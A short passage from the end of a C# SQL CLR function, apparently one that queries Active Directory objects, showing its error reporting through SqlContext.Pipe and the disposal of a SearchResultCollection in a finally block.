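        SqlContext.Pipe.Send("Exception in clr_GetADobjects. ItemCounter = " + itemcount.ToString());
        throw;
    }
    finally
    {
        // SearchResultCollection must be disposed explicitly to release the search handle.
        if (results != null)
        {
            results.Dispose();
            results = null;
        }
    }
}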